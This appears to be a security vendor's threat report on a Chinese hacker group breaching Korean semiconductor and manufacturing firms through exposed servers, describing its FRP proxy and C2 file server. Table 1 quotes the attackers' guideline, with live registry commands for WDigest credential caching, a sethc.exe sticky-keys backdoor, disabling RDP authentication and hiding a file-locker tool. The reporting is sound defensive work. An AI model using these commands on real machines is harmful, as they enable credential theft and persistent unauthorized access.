Chinese Hacker Group Stealing Information From Korean Companies
Recently, there have been frequent cases of attacks targeting vulnerable servers that are accessible externally, such as SQL servers or IIS web servers.
The team has confirmed two affected companies in this case. One being a company for semiconductors, and the other being a smart manufacturing company which utilizes artificial intelligence. It is assumed that the threat group that carried out the hacking attack is a Chinese hacker group like Xiaoqiying and Dalbit, as a Chinese text file containing instructions on how to use the hacking tool was found.
Chinese Hacker Group’s Guideline
| reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f !! 禁止强制名,以管理的身行cmd 行以下命令 Win2012 Can: \Easy File Locker (!!!注意:只需要予Access限,其他都不需要,切切) 除1. REG delete “HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker” /f C:/Users/Public/Documents/EFL/rule.ini 藏的定在此 cmd.exe /c reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f 1.reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f \配置端口3389 reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f |
Table 1. Text file containing the guideline for the hacking tool used by the hacker group
Threat Actor’s Server and Exfiltrated Information
The servers confirmed to be used by the threat actor are as follows:
FRP Management Server
The threat actor installed an FRP on the servers of the affected companies. Therefore, on the page shown in Figure 1, it is possible to confirm the information of the infected PCs that have FRP installed and the proxy servers used by the threat actor.
Previous blog posts, including one on the ‘Dalbit’ APT group, as well as the AhnLab TIP service’s ‘Analysis Report on Attack Cases Exploiting Various Remote Control Tools‘, have provided detailed coverage of attack methods that utilize FRP.
Dalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign
Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies
File Server
This server contains hacking tools such as CobaltStrike, VPN, remote control, etc., as well as many log files. As shown in Figure 2, these log files are located inside a directory named with numbers. The stolen logs contain credential and network information alongside information that is assumed to be inside material from companies.
The threat actor’s C2 server is still accessible and partial pieces of information from the affected companies are currently exposed. Therefore, they will not be disclosed here in order to prevent additional harm.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
